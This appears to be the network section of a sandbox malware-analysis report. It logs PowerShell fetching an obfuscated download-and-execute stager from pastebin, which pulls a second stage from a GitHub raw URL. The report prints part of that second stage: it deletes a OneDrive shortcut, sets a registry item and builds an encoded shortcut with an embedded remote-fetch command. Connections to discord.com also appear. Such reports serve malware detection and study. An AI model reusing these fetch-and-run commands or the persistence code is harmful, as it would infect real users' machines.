                                                                              Oct 15, 2024 15:53:53.044193983 CEST49900443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:53.091407061 CEST44349900104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:53.187694073 CEST44349900104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:53.187827110 CEST44349900104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:53.187890053 CEST49900443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:53.204822063 CEST49900443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:53.217037916 CEST4990680192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:53.222877979 CEST8049906185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:53.222979069 CEST4990680192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:53.223172903 CEST4990680192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:53.229327917 CEST8049906185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:53.830679893 CEST8049906185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:53.830940008 CEST4990680192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:53.831984997 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:53.832030058 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:53.832118034 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:53.832362890 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:53.832376957 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:53.832897902 CEST8049906185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:53.832987070 CEST4990680192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:53.836374998 CEST8049906185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.443655968 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.443824053 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:54.445601940 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:54.445616007 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.445879936 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.446976900 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:54.491419077 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.575696945 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.575763941 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.575809956 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.575813055 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:54.575845957 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.575881958 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.575886011 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:54.575894117 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.575937986 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:54.575984001 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.576041937 CEST44349910185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:54.576129913 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:54.603553057 CEST49910443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:54:00.795212030 CEST49947443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:00.795242071 CEST44349947162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:00.795314074 CEST49947443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:00.795685053 CEST49947443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:00.795697927 CEST44349947162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:01.414022923 CEST44349947162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:01.414112091 CEST49947443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:01.472002983 CEST49947443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:01.472019911 CEST44349947162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:01.473120928 CEST44349947162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:01.474561930 CEST49947443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:01.515410900 CEST44349947162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:01.515465975 CEST49947443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:01.515475035 CEST44349947162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:01.793601036 CEST44349947162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:01.793724060 CEST44349947162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:01.793792009 CEST49947443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:01.799756050 CEST49947443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:06.817138910 CEST4985480192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:54:06.983773947 CEST49979443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:06.983810902 CEST44349979162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:06.983871937 CEST49979443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:06.984483957 CEST49979443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:06.984500885 CEST44349979162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:07.623039007 CEST44349979162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:07.623253107 CEST49979443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:07.632833004 CEST49979443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:07.632858038 CEST44349979162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:07.633719921 CEST44349979162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:07.635293007 CEST49979443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:07.675443888 CEST44349979162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:07.675578117 CEST49979443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:07.675586939 CEST44349979162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:08.153954983 CEST44349979162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:08.154295921 CEST44349979162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:54:08.154375076 CEST49979443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:08.160701990 CEST49979443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:54:13.184954882 CEST4989480192.168.2.7104.20.4.235

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 15, 2024 15:53:10.023447990 CEST5750253192.168.2.71.1.1.1
                                                                              Oct 15, 2024 15:53:44.445338964 CEST5742153192.168.2.71.1.1.1
                                                                              Oct 15, 2024 15:53:44.453912973 CEST53574211.1.1.1192.168.2.7
                                                                              Oct 15, 2024 15:53:46.011034012 CEST5260953192.168.2.71.1.1.1
                                                                              Oct 15, 2024 15:53:46.018405914 CEST53526091.1.1.1192.168.2.7
                                                                              Oct 15, 2024 15:53:47.318708897 CEST6315753192.168.2.71.1.1.1
                                                                              Oct 15, 2024 15:53:47.784800053 CEST53631571.1.1.1192.168.2.7

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 15, 2024 15:53:10.023447990 CEST192.168.2.71.1.1.10x715bStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:44.445338964 CEST192.168.2.71.1.1.10xc822Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:46.011034012 CEST192.168.2.71.1.1.10xf796Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:47.318708897 CEST192.168.2.71.1.1.10x39d1Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 15, 2024 15:53:10.031765938 CEST1.1.1.1192.168.2.70x715bNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:13.040446997 CEST1.1.1.1192.168.2.70xa435No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:13.040446997 CEST1.1.1.1192.168.2.70xa435No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:44.453912973 CEST1.1.1.1192.168.2.70xc822No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:44.453912973 CEST1.1.1.1192.168.2.70xc822No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:44.453912973 CEST1.1.1.1192.168.2.70xc822No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:46.018405914 CEST1.1.1.1192.168.2.70xf796No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:46.018405914 CEST1.1.1.1192.168.2.70xf796No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:46.018405914 CEST1.1.1.1192.168.2.70xf796No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:46.018405914 CEST1.1.1.1192.168.2.70xf796No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:47.784800053 CEST1.1.1.1192.168.2.70x39d1No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:47.784800053 CEST1.1.1.1192.168.2.70x39d1No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:47.784800053 CEST1.1.1.1192.168.2.70x39d1No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:47.784800053 CEST1.1.1.1192.168.2.70x39d1No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                              Oct 15, 2024 15:53:47.784800053 CEST1.1.1.1192.168.2.70x39d1No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • pastebin.com
                                                                              • raw.githubusercontent.com
                                                                              • discord.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.749854104.20.4.235807412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:53:44.477516890 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:53:45.084228992 CEST472INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 15 Oct 2024 13:53:45 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 167
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Tue, 15 Oct 2024 14:53:45 GMT
                                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304c104c432ccc-DFW
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.749865185.199.108.133807412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:53:46.027915955 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:53:46.638725042 CEST541INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              Content-Length: 0
                                                                              Server: Varnish
                                                                              Retry-After: 0
                                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:53:46 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdfw8210036-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 0
                                                                              X-Timer: S1729000427.571438,VS0,VE0
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Expires: Tue, 15 Oct 2024 13:58:46 GMT
                                                                              Vary: Authorization,Accept-Encoding


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.749894104.20.4.23580336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:53:51.701632023 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:53:52.332614899 CEST472INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 15 Oct 2024 13:53:52 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 167
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Tue, 15 Oct 2024 14:53:52 GMT
                                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304c3d7ca8485d-DFW
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.749906185.199.108.13380336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 15, 2024 15:53:53.223172903 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              Oct 15, 2024 15:53:53.830679893 CEST541INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              Content-Length: 0
                                                                              Server: Varnish
                                                                              Retry-After: 0
                                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:53:53 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdal2120127-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 0
                                                                              X-Timer: S1729000434.764381,VS0,VE0
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Expires: Tue, 15 Oct 2024 13:58:53 GMT
                                                                              Vary: Authorization,Accept-Encoding


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.749860104.20.4.2354437412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:45 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:45 UTC396INHTTP/1.1 200 OK
                                                                              Date: Tue, 15 Oct 2024 13:53:45 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: HIT
                                                                              Age: 75
                                                                              Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304c15dc732fec-DFW
                                                                              2024-10-15 13:53:45 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                              Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                              2024-10-15 13:53:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.749867185.199.108.1334437412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:47 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:47 UTC901INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 7508
                                                                              Cache-Control: max-age=300
                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: deny
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:53:47 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdfw8210155-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 1
                                                                              X-Timer: S1729000428.842679,VS0,VE1
                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              X-Fastly-Request-ID: fa7d2ebf2d2b0deb517d23c0b0799c6fadd4cd05
                                                                              Expires: Tue, 15 Oct 2024 13:58:47 GMT
                                                                              Source-Age: 75
                                                                              2024-10-15 13:53:47 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                              2024-10-15 13:53:47 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                              2024-10-15 13:53:47 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                              2024-10-15 13:53:47 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
